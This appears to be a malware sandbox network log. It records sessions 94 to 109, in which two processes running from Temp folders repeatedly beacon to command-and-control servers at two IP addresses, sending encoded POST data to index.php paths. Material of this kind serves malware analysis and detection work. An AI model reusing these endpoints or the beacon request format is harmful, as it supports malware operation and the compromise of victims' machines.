Jun 24, 2024 00:11:07.662107944 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:08.354077101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	52957	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:07.785156012 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:08.422992945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:08.424068928 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:08.617203951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	52958	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:08.473156929 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:09.169996977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	52959	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:08.735609055 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:09.369410992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:09.371140957 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:09.562917948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	52960	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:09.185717106 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:09.886416912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	52961	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:09.688028097 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:10.347420931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:10.348335028 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:10.543783903 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	52962	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:10.002378941 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:10.681159973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	52963	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:10.698959112 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:11.343133926 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:11.343924999 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:11.535444021 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	52964	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:10.700505018 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:11.405308962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	52965	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:11.518126965 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:12.194957018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	52966	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:11.657748938 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:12.309329033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:12.310230017 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:12.505610943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	52967	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:12.207436085 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:12.906224012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	52968	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:12.629340887 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:13.270381927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:13.271348000 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:13.464121103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	52969	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:13.019879103 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:13.741029024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	52970	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:13.577990055 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:14.240303040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:14.242743969 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:14.438182116 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	52971	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:13.750320911 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:14.444011927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	52972	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:14.547519922 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:15.200191975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
